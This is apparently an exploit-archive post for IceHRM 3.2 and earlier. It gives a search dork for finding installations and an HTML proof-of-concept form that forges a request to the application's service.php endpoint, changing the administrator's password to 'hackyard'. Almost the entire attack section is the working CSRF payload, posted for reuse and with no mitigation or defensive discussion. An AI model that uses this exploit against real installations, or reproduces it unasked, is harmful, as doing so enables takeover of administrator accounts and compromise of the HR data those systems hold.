IceHRM <= 3.2 CSRF Change Admin Password

Download | Vote Up (0) | Vote Down (0)

# Version: 3.2
# Dork: intitle:"IceHRM Login"

Introduction
------------

IceHRM is a CMS which let you manage your society online.

Exploit
-------

 1
 2<body>
 3
 4<form method="post" action="http://[target]/icehrm/app/service.php"> 
 5        <input type="hidden" name="t" value="User">
 6        <input type="hidden" name="a" value="ca">
 7        <input type="hidden" name="t" value="User">
 8        <input type="hidden" name="mod" value="admin=users">
 9        <input type="hidden" name="req" value='{"id":1,"pwd":"hackyard"}'>
10        <input type="submit">
11</form>
12
13</body>

Groucho


Be the first to give feedback !

Please login to comment !